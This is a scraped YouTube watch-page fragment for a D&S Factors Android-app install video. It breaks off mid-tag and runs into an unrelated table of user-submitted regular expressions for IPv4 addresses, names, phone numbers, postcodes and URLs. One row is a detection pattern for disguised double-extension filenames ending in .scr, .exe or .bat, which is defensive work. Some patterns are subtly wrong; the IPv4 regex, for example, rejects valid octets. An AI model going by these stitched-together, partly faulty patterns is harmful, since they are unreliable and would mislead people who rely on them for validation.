data-href="https://accounts.google.com/ServiceLogin?continue=http%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26continue_action%3DQUFFLUhqay16UU5weWNHSHNNWUU1cS1FSkM5ZUxxdDktd3xBQ3Jtc0tuTzlKdXZfcFMxU0FFZkRDYWs1RzNpUURUSkpqdXdCRXBOcWN0RkFUWVQ0YUNwcmJvM2wwR3kxS3l3c0R4S0c1bFZsYXUzRjI1Y2t1Zno5WUVQd09hbGg0QkYwYko4MmlZR2lUNXptWG51eF80U3hOd2lVMm9xUTJkaU1nUzZYWEJoQ2tFMm85RzdZejhCY2RRQmpEb0Rhd29EUjd3M25QVEE3bkZDc3FDc3Z0OTB3Tmx5cUNXMWk2NzBhM090bzE3U05pbkc%253D%26feature%3Dsubscribe%26hl%3Den%26next%3D%252Fchannel%252FUCMWF7NAPUh9bHQdKABkt4Rw&passive=true&uilel=3&hl=en&service=youtube" data-style-type="branded" data-channel-external-id="UCMWF7NAPUh9bHQdKABkt4Rw" data-sessionlink="ved=CBQQmys&feature=watch&ei=gHmgU6rPMMah-AOzuIDwAg"><span class="yt-uix-button-icon-wrapper"><img src="https://s.ytimg.com/yts/img/pixel-vfl3z5WfW.gif" class="yt-uix-button-icon yt-uix-button-icon-subscribe"></span><span class="yt-uix-button-content"><span class="subscribe-label" aria-label="Subscribe">Subscribe</span><span class="subscribed-label" aria-label="Unsubscribe">Subscribed</span><span class="unsubscribe-label" aria-label="Unsubscribe">Unsubscribe</span> </span></button><button class="yt-uix-button yt-uix-button-size-default yt-uix-button-default yt-uix-button-empty yt-uix-button-has-icon yt-uix-subscription-preferences-button" type="button" onclick=";return false;" data-channel-external-id="UCMWF7NAPUh9bHQdKABkt4Rw"><span class="yt-uix-button-icon-wrapper"><img src="https://s.ytimg.com/yts/img/pixel-vfl3z5WfW.gif" class="yt-uix-button-icon yt-uix-button-icon-subscription-preferences"></span></button><span class="yt-subscription-button-subscriber-count-branded-horizontal" title="2">2</span> <span class="yt-subscription-button-disabled-mask" title=""></span>
<div class="yt-uix-overlay " data-overlay-style="primary"data-overlay-shape="tiny">
<div class="yt-dialog hid ">
<div class="yt-dialog-base">
<span class="yt-dialog-align"></span>
<div class="yt-dialog-fg">
<div class="yt-dialog-fg-content">
<div class="yt-dialog-header">
<h2 class="yt-dialog-title">
Subscription preferences
</h2>
</div>
<div class="yt-dialog-loading">
<div class="yt-dialog-waiting-content">
<div class="yt-spinner-img"></div><div class="yt-dialog-waiting-text">Loading...</div>
</div>
</div>
<div class="yt-dialog-content">
<div class="subscription-preferences-overlay-content-container">
<div class="subscription-preferences-overlay-loading ">
<p class="yt-spinner">
<img src="https://s.ytimg.com/yts/img/pixel-vfl3z5WfW.gif" alt="Loading icon" class="yt-spinner-img">
<span class="yt-spinner-message">
Loading...
</span>
</p>
</div>
<div class="subscription-preferences-overlay-content">
</div>
</div>
</div>
<div class="yt-dialog-working">
<div class="yt-dialog-working-overlay"></div>
<div class="yt-dialog-working-bubble">
<div class="yt-dialog-waiting-content">
<div class="yt-spinner-img"></div><div class="yt-dialog-waiting-text">Working...</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</span></span><div id="watch7-views-info"><span class="watch-view-count">5 views</span>
<div class="video-extras-sparkbars">
<div class="video-extras-sparkbar-likes" style="width: 0%"></div>
<div class="video-extras-sparkbar-dislikes" style="width: 0%"></div>
</div>
<span class="video-extras-likes-dislikes">
<img class="icon-watch-stats-like" src="https://s.ytimg.com/yts/img/pixel-vfl3z5WfW.gif" alt="Like">
<span class="likes-count">0</span>
<img class="icon-watch-stats-dislike" src="https://s.ytimg.com/yts/img/pixel-vfl3z5WfW.gif" alt="Dislike">
<span class="dislikes-count">0</span>
</span>
</div></div>
</div>
<div id="watch7-action-buttons" class="clearfix">
<div id="watch7-sentiment-actions">
<span id="watch-like-dislike-buttons" class="yt-uix-button-group " data-vote-state="2" data-button-toggle-group="optional"><span class="yt-uix-clickcard"><button class="yt-uix-button yt-uix-button-size-default yt-uix-button-text yt-uix-button-has-icon yt-uix-clickcard-target yt-uix-tooltip" type="button" onclick=";return false;" title="" id="watch-like" data-force-position="true" data-like-tooltip="I like this" data-position="bottomright" data-orientation="vertical" data-unlike-tooltip="Unlike" data-button-toggle="true"><span class="yt-uix-button-icon-wrapper"><img src="https://s.ytimg.com/yts/img/pixel-vfl3z5WfW.gif" class="yt-uix-button-icon yt-uix-button-icon-watch-like"></span><span class="yt-uix-button-content">Like </span></button> <div class="watch7-hovercard yt-uix-clickcard-content">
<h3 class="watch7-hovercard-header">Sign in to YouTube</h3>
<div class="watch7-hovercard-message">
Sign in with your Google Account (YouTube, Google+, Gmail, Orkut, Picasa, or Chrome) to like <span class="yt-user-name g-hovercard" dir="ltr" data-ytid="UCMWF7NAPUh9bHQdKABkt4Rw">D&S Factors LLC</span>'s video.
</div>
<ul class="watch7-hovercard-icon-strip clearfix">
<li class="watch7-hovercard-icon">
<div class="watch7-hovercard-youtube-icon"></div>
</li>
<li class="watch7-hovercard-icon">
<div class="watch7-hovercard-gplus-icon"></div>
</li>
<li class="watch7-hovercard-icon">
<div class="watch7-hovercard-gmail-icon"></div>
</li>
<li class="watch7-hovercard-icon">
<div class="watch7-hovercard-picasa-icon"></div>
</li>
<li class="watch7-hovercard-icon">
<div class="watch7-hovercard-chrome-icon"></div>
</li>
</ul>
<div class="watch7-hovercard-account-line">
<a href="https://accounts.google.com/ServiceLogin?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26feature%3D__FEATURE__%26hl%3Den%26next%3D%252Fwatch%253Fv%253DEisQGYxhI1U&passive=true&uilel=3&hl=en&service=youtube" class="yt-uix-button yt-uix-sessionlink yt-uix-button-primary yt-uix-button-size-default" data-sessionlink="ei=gHmgU6rPMMah-AOzuIDwAg"><span class="yt-uix-button-content">Sign in </span></a>
</div>
</div>
</span><span class="yt-uix-clickcard"><button class="yt-uix-button yt-uix-button-size-default yt-uix-button-text yt-uix-button-empty yt-uix-button-has-icon yt-uix-clickcard-target yt-uix-tooltip" type="button" onclick=";return false;" title="I dislike this" id="watch-dislike" data-force-position="true" data-position="bottomright" data-orientation="vertical" data-button-toggle="true"><span class="yt-uix-button-icon-wrapper"><img src="https://s.ytimg.com/yts/img/pixel-vfl3z5WfW.gif" alt="I dislike this" class="yt-uix-button-icon yt-uix-button-icon-watch-dislike"></span></button> <div class="watch7-hovercard yt-uix-clickcard-content">
<h3 class="watch7-hovercard-header">Sign in to YouTube</h3>
<div class="watch7-hovercard-message">
Sign in with your Google Account (YouTube, Google+, Gmail, Orkut, Picasa, or Chrome) to dislike <span class="yt-user-name g-hovercard" dir="ltr" data-ytid="UCMWF7NAPUh9bHQdKABkt4Rw">D&S Factors LLC</span>'s video.
</div>
<ul class="watch7-hovercard-icon-strip clearfix">
<li class="watch7-hovercard-icon">
<div class="watch7-hovercard-youtube-icon"></div>
</li>
<li class="watch7-hovercard-icon">
<div class="watch7-hovercard-gplus-icon"></div>
</li>
<li class="watch7-hovercard-icon">
<div class="watch7-hovercard-gmail-icon"></div>
</li>
<li class="watch7-hovercard-icon">
<div class="watch7-hovercard-picasa-icon"></div>
</li>
<li class="watch7-hovercard-icon">
<div class="watch7-hovercard-chrome-icon"></div>
</li>
</ul>
<div class="watch7-hovercard-account-line">
<a href="https://accounts.google.com/ServiceLogin?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26feature%3D__FEATURE__%26hl%3Den%26next%3D%252Fwatch%253Fv%253DEisQGYxhI1U&passive=true&uilel=3&hl=en&service=youtube" class="yt-uix-button yt-uix-sessionlink yt-uix-button-primary yt-uix-button-size-default" data-sessionlink="ei=gHmgU6rPMMah-AOzuIDwAg"><span class="yt-uix-button-content">Sign in </span></a>
</div>
</div>
</span></span>
</div>
<div id="watch7-secondary-actions" class="yt-uix-button-group" data-button-toggle-group="required">
<span >
<button class="yt-uix-button yt-uix-button-size-default yt-uix-button-text action-panel-trigger yt-uix-button-toggled yt-uix-tooltip" type="button" onclick=";return false;" title="" data-trigger-for="action-panel-details" data-button-toggle="true"><span class="yt-uix-button-content">About </span></button>
</span>
<span >
<button class="yt-uix-button yt-uix-button-size-default yt-uix-button-text action-panel-trigger yt-uix-tooltip" type="button" onclick=";return false;" title="" data-trigger-for="action-panel-share" data-button-toggle="true"><span class="yt-uix-button-content">Share </span></button>
</span>
<span class="yt-uix-clickcard">
<button class="yt-uix-button yt-uix-button-size-default yt-uix-button-text action-panel-trigger yt-uix-clickcard-target yt-uix-tooltip" type="button" onclick=";return false;" title="" data-trigger-for="action-panel-none" data-upsell="playlist" data-position="bottomleft" data-orientation="vertical" data-button-toggle="true"><span class="yt-uix-button-content">Add to </span></button>
<div class="watch7-hovercard yt-uix-clickcard-content">
<h3 class="watch7-hovercard-header">Sign in to YouTube</h3>
<div class="watch7-hovercard-message">
Sign in with your Google Account (YouTube, Google+, Gmail, Orkut, Picasa, or Chrome) to add <span class="yt-user-name g-hovercard" dir="ltr" data-ytid="UCMWF7NAPUh9bHQdKABkt4Rw">D&S Factors LLC</span>'s video to your playlist.
</div>
<ul class="watch7-hovercard-icon-strip clearfix">
<li class="watch7-hovercard-icon">
<div class="watch7-hovercard-youtube-icon"></div>
</li>
<li class="watch7-hovercard-icon">
<div class="watch7-hovercard-gplus-icon"></div>
</li>
<li class="watch7-hovercard-icon">
<div class="watch7-hovercard-gmail-icon"></div>
</li>
<li class="watch7-hovercard-icon">
<div class="watch7-hovercard-picasa-icon"></div>
</li>
<li class="watch7-hovercard-icon">
<div class="watch7-hovercard-chrome-icon"></div>
</li>
</ul>
<div class="watch7-hovercard-account-line">
<a href="https://accounts.google.com/ServiceLogin?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26feature%3D__FEATURE__%26hl%3Den%26next%3D%252Fwatch%253Fv%253DEisQGYxhI1U&passive=true&uilel=3&hl=en&service=youtube" class="yt-uix-button yt-uix-sessionlink yt-uix-button-primary yt-uix-button-size-default" data-sessionlink="ei=gHmgU6rPMMah-AOzuIDwAg"><span class="yt-uix-button-content">Sign in </span></a>
</div>
</div>
</span>
<span >
<button class="yt-uix-button yt-uix-button-size-default yt-uix-button-text yt-uix-button-empty yt-uix-button-has-icon action-panel-trigger yt-uix-tooltip" type="button" onclick=";return false;" title="Statistics" data-trigger-for="action-panel-stats" data-button-toggle="true"><span class="yt-uix-button-icon-wrapper"><img src="https://s.ytimg.com/yts/img/pixel-vfl3z5WfW.gif" alt="Statistics" class="yt-uix-button-icon yt-uix-button-icon-action-panel-stats"></span></button>
</span>
<span >
<button class="yt-uix-button yt-uix-button-size-default yt-uix-button-text yt-uix-button-empty yt-uix-button-has-icon action-panel-trigger yt-uix-tooltip" type="button" onclick=";return false;" title="Report" data-trigger-for="action-panel-report" data-button-toggle="true"><span class="yt-uix-button-icon-wrapper"><img src="https://s.ytimg.com/yts/img/pixel-vfl3z5WfW.gif" alt="Report" class="yt-uix-button-icon yt-uix-button-icon-action-panel-report"></span></button>
</span>
</div>
</div>
<div id="watch7-action-panels" class="yt-uix-button-panel ">
<div id="action-panel-details" class="action-panel-content ">
<div id="watch-description" class="yt-uix-expander yt-uix-expander-collapsed yt-uix-expander-head yt-uix-button-panel">
<div id="watch-description-content">
<div id="watch-description-clip">
<p id="watch-uploader-info">
<strong>Published on Jun 16, 2014</strong>
</p>
<div id="watch-description-text">
<p id="eow-description" >D&S Factors has gone mobile! This short video has step by step instructions to download & install the app on your android phone.</p>
</div>
<div id="watch-description-extras" class="yt-uix-expander-body">
<ul class="watch-extras-section">
<li></li>
<li></li>
<li></li>
<li></li>
<li></li>
<li>
<h4 class="title">
Category
</h4>
<div class="content">
<p id="eow-category">
<a href="/people" class=" yt-uix-sessionlink spf-link " data-sessionlink="ei=gHmgU6rPMMah-AOzuIDwAg">People & Blogs</a>
</p>
</div>
</li>
<li>
<h4 class="title">License</h4>
<div class="content">
<p id="eow-reuse">
Standard YouTube License
</p>
</div>
</li>
</ul>
</div>
</div>
<ul id="watch-description-extra-info">
</ul>
</div>
<div id="watch-description-toggle" class="toggle-wrapper">
<div class="yt-uix-expander-collapsed-body">
<button class="yt-uix-button yt-uix-button-size-default yt-uix-button-text toggle-button" type="button" onclick=";return false;"><span class="yt-uix-button-content">Show more </span></button>
</div>
<div class="yt-uix-expander-body">
<button class="yt-uix-button yt-uix-button-size-default yt-uix-button-text toggle-button" type="button" onclick=";return false;"><span class="yt-uix-button-content">Show less </span></button>
</div>
</div>
</div>
</div>
<div id="action-panel-share" class="action-panel-content hid">
<div id="watch-actions-share-loading">
<div class="action-panel-loading">
<p class="yt-spinner">
<img src="https://s.ytimg.com/yts/img/pixel-vfl3z5WfW.gif" alt="Loading icon" class="yt-spinner-img">
<span class="yt-spinner-message">
Loading...
</span>
</p>
</div>
</div>
<div id="watch-actions-share-panel"></div>
</div>
<div id="action-panel-addto" class="action-panel-content hid" data-auth-required="true">
<div class="action-panel-loading">
<p class="yt-spinner">
<img src="https://s.ytimg.com/yts/img/pixel-vfl3z5WfW.gif" alt="Loading icon" class="yt-spinner-img">
<span class="yt-spinner-message">
Loading...
</span>
</p>
</div>
</div>
<div id="action-panel-stats" class="action-panel-content hid">
<div class="action-panel-loading">
<p class="yt-spinner">
<img src="https://s.ytimg.com/yts/img/pixel-vfl3z5WfW.gif" alt="Loading icon" class="yt-spinner-img">
<span class="yt-spinner-message">
Loading...
</span>
</p>
</div>
</div>
<div id="action-panel-report" class="action-panel-content hid" data-auth-required="true">
<div class="action-panel-loading">
<p class="yt-spinner">
<img src="https://s.ytimg.com/yts/img/pixel-vfl3z5WfW.gif" alt="Loading icon" class="yt-spinner-img">
<span class="yt-spinner-message">
Loading...
</span>
</p>
</div>
</div>
<div id="action-panel-login" class="action-panel-content hid">
<div class="action-panel-login">
<a href="https://accounts.google.com/ServiceLogin?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26feature%3D__FEATURE__%26hl%3Den%26next%3D%252Fwatch%253Fv%253DEisQGYxhI1U&passive=true&uilel=3&hl=en&service=youtube" class="yt-uix-button yt-uix-sessionlink yt-uix-button-default yt-uix-button-size-default" data-sessionlink="ei=gHmgU6rPMMah-AOzuIDwAg"><span class="yt-uix-button-content">Sign in </span></a>
</div>
</div>
<div id="action-panel-ratings-disabled" class="action-panel-content hid">
<div id="watch-actions-ratings-disabled" class="watch-actions-panel">
<em>Ratings have been disabled for this video.</em>
</div>
</div>
<div id="action-panel-rental-required" class="action-panel-content hid">
<div id="watch-actions-rental-required" class="watch-actions-panel">
<strong>Rating is available when the video has been rented.</strong>
</div>
</div>
<div id="action-panel-error" class="action-panel-content hid">
<div class="action-panel-error">
This feature is not available right now. Please try again later.
</div>
</div>
<div id="watch7-action-panel-footer">
<hr class="yt-horizontal-rule ">
</div>
</div>
<div class="cmt_iframe_holder" data-href="http://www.youtube.com/watch?v=EisQGYxhI1U" data-viewtype="FILTERED" style="display: none;"></div>
<div id="watch-discussion" class="">
<div class="comments-iframe-container">
<div id="comments-test-iframe"></div>
<div id="distiller-spinner" class="action-panel-loading">
<p class="yt-spinner">
<img src="https://s.ytimg.com/yts/img/pixel-vfl3z5WfW.gif" alt="Loading icon" class="yt-spinner-img">
<span class="yt-spinner-message">
Loading...
</span>
</p>
</div>
</div>
</div>
</div>
<div id="watch7-sidebar" class="watch-sidebar">
<div id="watch7-sidebar-playlist">
</div>
<div id="watch7-sidebar-contents" class="watch-sidebar-gutter ">
<div id="watch7-sidebar-offer">
</div>
<div id="watch7-sidebar-discussion"></div>
<div id="watch7-sidebar-ads">
</div>
<div id="watch7-sidebar-modules">
<div class="watch-sidebar-section">
<div class="watch-sidebar-body">
<ul id="watch-related" class="video-list">
<li class="video-list-item related-list-item"> <a href="/watch?v=tdepiq9dzSw" class=" related-video spf-link yt-uix-sessionlink" data-sessionlink="ved=CAMQzRooAA&feature=watch-vrec&ei=gHmgU6rPMMah-AOzuIDwAg"><span class="yt-uix-simple-thumb-wrap yt-uix-simple-thumb-related" data-vid="tdepiq9dzSw"><img alt="" src="https://s.ytimg.com/yts/img/pixel-vfl3z5WfW.gif" aria-hidden="true" data-thumb="//i1.ytimg.com/vi/tdepiq9dzSw/default.jpg" width="120" height="90" ><span class="video-time">3:47</span>
<button class="yt-uix-button yt-uix-button-size-small yt-uix-button-default addto-button video-actions spf-nolink hide-until-delayloaded addto-watch-later-button-sign-in yt-uix-tooltip" type="button" onclick=";return false;" title="Watch Later" data-video-ids="tdepiq9dzSw" data-button-menu-id="shared-addto-watch-later-login"><span class="yt-uix-button-content"> <img src="https://s.ytimg.com/yts/img/pixel-vfl3z5WfW.gif" alt="Watch Later">
</span><img src="https://s.ytimg.com/yts/img/pixel-vfl3z5WfW.gif" class="yt-uix-button-arrow"></button>
</span> <span dir="ltr" class="title" title="Peterborough Court House No Consent, No Jurisdiction, I Am Not That LEGAL FICTION .wmv">
Peterborough Court House No Consent, No Jurisdiction, I Am Not That LEGAL FICTION .wmv
</span>
<span class="stat attribution">
<span class="g-hovercard"
data-ytid="UC6Zh3kEoW5QbYbOILCd2Jtw"
data-name="watch-vrec"
>
by <b><span class=" g-hovercard" data-ytid="UC6Zh3kEoW5QbYbOILCd2Jtw">ziggieization</span></b>
</span>
</span>
<span class="stat view-count">Recommended for you</span>
</a>
</li><li class="video-list-item related-list-item"> <a href="/watch?v=vG1EaStcrs0" class=" related-video spf-link yt-uix-sessionlink" data-sessionlink="ved=CAQQzRooAQ&feature=related&ei=gHmgU6rPMMah-AOzuIDwAg"><span class="yt-uix-simple-thumb-wrap yt-uix-simple-thumb-related" data-vid="vG1EaStcrs0"><img alt="" src="https://s.ytimg.com/yts/img/pixel-vfl3z5WfW.gif" aria-hidden="true" data-thumb="//i1.ytimg.com/vi/vG1EaStcrs0/default.jpg" width="120" height="90" ><span class="video-time">2:49</span>
<button class="yt-uix-button yt-uix-button-size-small yt-uix-button-default addto-button video-actions spf-nolink hide-until-delayloaded addto-watch-later-button-sign-in yt-uix-tooltip" type="button" onclick=";return false;" title="Watch Later" data-video-ids="vG1EaStcrs0" data-button-menu-id="shared-addto-watch-later-login"><span class="yt-uix-button-content"> <img src="https://s.ytimg.com/yts/img/pixel-vfl3z5WfW.gif" alt="Watch Later">
</span><img src="https://s.ytimg.com/yts/img/pixel-vfl3z5WfW.gif" class="yt-uix-button-arrow"></button>
</span> <span dir="ltr" class="title" title="Fast And Furious 6 Hacks And Cheats -- [100% Working - Updated Version - Get It Here!]">
Fast And Furious 6 Hacks And Cheats -- [100% Working - Updated Version - Get It Here!]
</span>
<span class="stat attribution">
<span class="g-hovercard"
data-ytid="UC_l5zcyNgzGiIeV9vTDvkzg"
data-name="related"
>
by <b><span class=" g-hovercard" data-ytid="UC_l5zcyNgzGiIeV9vTDvkzg">Kitty Washington</span></b>
</span>
</span>
<span class="stat view-count">1,182 views</span>
</a>
</li><li class="video-list-item related-list-item"> <a href="/watch?v=34Bwt7QGkZQ" class=" related-video spf-link yt-uix-sessionlink" data-sessionlink="ved=CAUQzRooAg&feature=related&ei=gHmgU6rPMMah-AOzuIDwAg"><span class="yt-uix-simple-thumb-wrap yt-uix-simple-thumb-related" data-vid="34Bwt7QGkZQ"><img alt="" src="https://s.ytimg.com/yts/img/pixel-vfl3z5WfW.gif" aria-hidden="true" data-thumb="//i1.ytimg.com/vi/34Bwt7QGkZQ/default.jpg" width="120" height="90" ><span class="video-time">2:25</span>
<button class="yt-uix-button yt-uix-button-size-small yt-uix-button-default addto-button video-actions spf-nolink hide-until-delayloaded addto-watch-later-button-sign-in yt-uix-tooltip" type="button" onclick=";return false;" title="Watch Later" data-video-ids="34Bwt7QGkZQ" data-button-menu-id="shared-addto-watch-later-login"><span class="yt-uix-button-content"> <img src="https://s.ytimg.com/yts/img/pixel-vfl3z5WfW.gif" alt="Watch Later">
</span><img src="https://s.ytimg.com/yts/img/pixel-vfl3z5WfW.gif" class="yt-uix-button-arrow"></button>
</span> <span dir="ltr" class="title" title="Where is the Browse button? (New YouTube Layout 12/6/12)">
Where is the Browse button? (New YouTube Layout 12/6/12)
</span>
<span class="stat attribution">
<span class="g-hovercard"
data-ytid="UCnDK2nWu5s1UW46e7395E8Q"
data-name="related"
>
by <b><span class=" g-hovercard" data-ytid="UCnDK2nWu5s1UW46e7395E8Q">VideoLogDotCom</span></b>
</span>
</span>
<span class="stat view-count">11,364 views</span>
</a>
</li><li class="video-list-item related-list-item"> <a href="/watch?v=lO4QUmTHo1U" class=" related-video spf-link yt-uix-sessionlink" data-sessionlink="ved=CAYQzRooAw&feature=related&ei=gHmgU6rPMMah-AOzuIDwAg"><span class="yt-uix-simple-thumb-wrap yt-uix-simple-thumb-related" data-vid="lO4QUmTHo1U"><img alt="" src="https://s.ytimg.com/yts/img/pixel-vfl3z5WfW.gif" aria-hidden="true" data-thumb="//i1.ytimg.com/vi_webp/lO4QUmTHo1U/default.webp" width="120" height="90" ><span class="video-time">4:50</span>
<button class="yt-uix-button yt-uix-button-size-small yt-uix-button-default addto-button video-actions spf-nolink hide-until-delayloaded addto-watch-later-button-sign-in yt-uix-tooltip" type="button" onclick=";return false;" title="Watch Later" data-video-ids="lO4QUmTHo1U" data-button-menu-id="shared-addto-watch-later-login"><span class="yt-uix-button-content"> <img src="https://s.ytimg.com/yts/img/pixel-vfl3z5WfW.gif" alt="Watch Later">
</span><img src="https://s.ytimg.com/yts/img/pixel-vfl3z5WfW.gif" class="yt-uix-button-arrow"></button>
</span> <span dir="ltr" class="title" title="Samsung Galaxy Y Duos S6102 Dual">
Samsung Galaxy Y Duos S6102 Dual
</span>
<span class="stat attribution">
<span class="g-hovercard"
data-ytid="UChXMa8aQCVu0JjDAGo46nLg"
data-name="related"
>
by <b><span class=" g-hovercard" data-ytid="UChXMa8aQCVu0JjDAGo46nLg">MyWorldPhone Brian</span></b>
</span>
</span>
<span class="stat view-count">20,701 views</span>
</a>
</li><li class="video-list-item related-list-item"> <a href="/watch?v=HKRLoELTP0A" class=" related-video spf-link yt-uix-sessionlink" data-sessionlink="ved=CAcQzRooBA&feature=related&ei=gHmgU6rPMMah-AOzuIDwAg"><span class="yt-uix-simple-thumb-wrap yt-uix-simple-thumb-related" data-vid="HKRLoELTP0A"><img alt="" src="https://s.ytimg.com/yts/img/pixel-vfl3z5WfW.gif" aria-hidden="true" data-thumb="//i1.ytimg.com/vi/HKRLoELTP0A/default.jpg" width="120" height="90" ><span class="video-time">1:44</span>
<button class="yt-uix-button yt-uix-button-size-small yt-uix-button-default addto-button video-actions spf-nolink hide-until-delayloaded addto-watch-later-button-sign-in yt-uix-tooltip" type="button" onclick=";return false;" title="Watch Later" data-video-ids="HKRLoELTP0A" data-button-menu-id="shared-addto-watch-later-login"><span class="yt-uix-button-content"> <img src="https://s.ytimg.com/yts/img/pixel-vfl3z5WfW.gif" alt="Watch Later">
</span><img src="https://s.ytimg.com/yts/img/pixel-vfl3z5WfW.gif" class="yt-uix-button-arrow"></button>
</span> <span dir="ltr" class="title" title="DSO203 Digital Oscilloscope Portable 72msps 4 Channel">
DSO203 Digital Oscilloscope Portable 72msps 4 Channel
</span>
<span class="stat attribution">
<span class="g-hovercard"
data-ytid="UCM-fSqWkywyJoa_LglXMDYw"
data-name="related"
>
by <b><span class=" g-hovercard" data-ytid="UCM-fSqWkywyJoa_LglXMDYw">wekerss</span></b>
</span>
</span>
<span class="stat view-count">53,680 views</span>
</a>
</li><li class="video-list-item related-list-item"> <a href="/watch?v=RlF1Dc7WA4M" class=" related-video spf-link yt-uix-sessionlink" data-sessionlink="ved=CAgQzRooBQ&feature=related&ei=gHmgU6rPMMah-AOzuIDwAg"><span class="yt-uix-simple-thumb-wrap yt-uix-simple-thumb-related" data-vid="RlF1Dc7WA4M"><img alt="" src="https://s.ytimg.com/yts/img/pixel-vfl3z5WfW.gif" aria-hidden="true" data-thumb="//i1.ytimg.com/vi/RlF1Dc7WA4M/default.jpg" width="120" height="90" ><span class="video-time">4:32</span>
<button class="yt-uix-button yt-uix-button-size-small yt-uix-button-default addto-button video-actions spf-nolink hide-until-delayloaded addto-watch-later-button-sign-in yt-uix-tooltip" type="button" onclick=";return false;" title="Watch Later" data-video-ids="RlF1Dc7WA4M" data-button-menu-id="shared-addto-watch-later-login"><span class="yt-uix-button-content"> <img src="https://s.ytimg.com/yts/img/pixel-vfl3z5WfW.gif" alt="Watch Later">
</span><img src="https://s.ytimg.com/yts/img/pixel-vfl3z5WfW.gif" class="yt-uix-button-arrow"></button>
</span> <span dir="ltr" class="title" title="Faulty Android Box Stick MK802+">
Faulty Android Box Stick MK802+
</span>
<span class="stat attribution">
<span class="g-hovercard"
data-ytid="UCHE5bTimNfsvG4AVZQS7HjQ"
data-name="related"
>
by <b><span class=" g-hovercard" data-ytid="UCHE5bTimNfsvG4AVZQS7HjQ">cierny</span></b>
</span>
</span>
<span class="stat view-count">210 views</span>
</a>
</li><li class="video-list-item related-list-item"> <a href="/watch?v=aDbpKy6JU8U" class=" related-video spf-link yt-uix-sessionlink" data-sessionlink="ved=CAkQzRooBg&feature=related&ei=gHmgU6rPMMah-AOzuIDwAg"><span class="yt-uix-simple-thumb-wrap yt-uix-simple-thumb-related" data-vid="aDbpKy6JU8U"><img alt="" src="https://s.ytimg.com/yts/img/pixel-vfl3z5WfW.gif" aria-hidden="true" data-thumb="//i1.ytimg.com/vi/aDbpKy6JU8U/default.jpg" width="120" height="90" ><span class="video-time">0:58</span>
<button class="yt-uix-button yt-uix-button-size-small yt-uix-button-default addto-button video-actions spf-nolink hide-until-delayloaded addto-watch-later-button-sign-in yt-uix-tooltip" type="button" onclick=";return false;" title="Watch Later" data-video-ids="aDbpKy6JU8U" data-button-menu-id="shared-addto-watch-later-login"><span class="yt-uix-button-content"> <img src="https://s.ytimg.com/yts/img/pixel-vfl3z5WfW.gif" alt="Watch Later">
</span><img src="https://s.ytimg.com/yts/img/pixel-vfl3z5WfW.gif" class="yt-uix-button-arrow"></button>
</span> <span dir="ltr" class="title" title="ChipKIT Max32">
ChipKIT Max32
</span>
<span class="stat attribution">
<span class="g-hovercard"
data-ytid="UCE28KTwoif5NRfKfa5sQfsA"
data-name="related"
>
by <b><span class=" g-hovercard" data-ytid="UCE28KTwoif5NRfKfa5sQfsA">Thawatchai Srilardlao</span></b>
</span>
</span>
<span class="stat view-count">4,698 views</span>
</a>
</li><li class="video-list-item related-list-item"> <a href="/watch?v=G2qeNeEqITU" class=" related-video spf-link yt-uix-sessionlink" data-sessionlink="ved=CAoQzRooBw&feature=related&ei=gHmgU6rPMMah-AOzuIDwAg"><span class="yt-uix-simple-thumb-wrap yt-uix-simple-thumb-related" data-vid="G2qeNeEqITU"><img alt="" src="https://s.ytimg.com/yts/img/pixel-vfl3z5WfW.gif" aria-hidden="true" data-thumb="//i1.ytimg.com/vi/G2qeNeEqITU/default.jpg" width="120" height="90" ><span class="video-time">3:07</sp | dfrgeagtcer | 2016-03-06T07:33:45.000Z |
(^(([0-1]?\d{1,2})|(2[0-5]{2}))(\.(([0-1]?\d{1,2})|(2[0-5]{2}))){3}$) | 194.115.1.4
| ipv4 | 2015-06-10T07:56:51.000Z |
|
Name with title | ^([A-Z]|[a-z]|\s)+(,\s*(Jr\.|Sr\.|[IV]*))?$ | John Smith, Jr.
Winn Thomas
Mary 3llen Jones
Clyde Franklin, III
wallace firt, the second
wimbobimbo ff , VIVIVVVVIIIVIIVVI
s f asdf s dfFASFSf dsf saf sFD s faS fdy t sg , Sr. | Name with title | 2023-02-09T00:30:55.000Z |
^http(s)?:\/\/$ | http | 2015-08-05T17:39:27.000Z |
||
^([\+7]{2}|7{1}|8{1})([\(\-]*[0-9]{3}[\)\-]*)([0-9\-]{7,9})$ | russian number | 2020-10-25T20:24:44.000Z |
||
Regex untuk Alamat | ^[\w '-\/]+$ | Jl. Merpati No. 3 RT/RW 001/012 (Bekas Jalan Manyar) | Regex Alamat | 2021-07-06T03:24:28.000Z |
https?://(\S+\.)+\S+(/\S+)*/? | https://t.co/8OMryrUVET
https://regex101.com/
https://www.google.com/search?client=firefox-b-d&q=nltk+string+cleaning
https://machinelearningmastery.com/clean-text-machine-learning-python/
py New Year from #MarALago! Thank you to my...
4 Well the year has officially begun. I have man...
5 I will be going to Mississippi tomorrow night ...
6 The person that Hillary Clinton least wants to...
7 Thank you so much to https://t.co/8OMryrUVET f...
8 #VoteTrump2016 & together we will #MakeAmerica... | URLS | 2019-04-12T14:17:09.000Z |
|
rast | (string@)([a-zA-ZÀ-ž]|\\[0-9]{3})+ | string@řetězec\032s\032lomítkem\032\092\032a\010novým\035řádkem
string@\032<not-tag/>\032 | basic | 2022-02-19T13:35:39.000Z |
. | filename=\s?.*\.((hwp|pdf|jpg|png)?.{3,4}).*\s{5,}\.(scr|exe|COM|bat)\s | sdfsdfsf
filename=abcdef.pptx kk (12kb) .scr
sdfdsf | 확장자 트릭. | 2021-04-02T14:41:35.000Z |
Postcode hoofdletter ongevoelig. Inclusief eventuele spatie. | ^[1-9][0-9]{3}\s?[A-Z]{2}$ | Postcode | 2016-08-23T06:55:36.000Z |
|
([a-zA-Z])+(\d+)([]a-zA-Z]+) | A12b s17G
P34562Z q2576f H456z
a1A
| LettersChangeNumber | 2016-04-23T09:04:11.000Z |
|
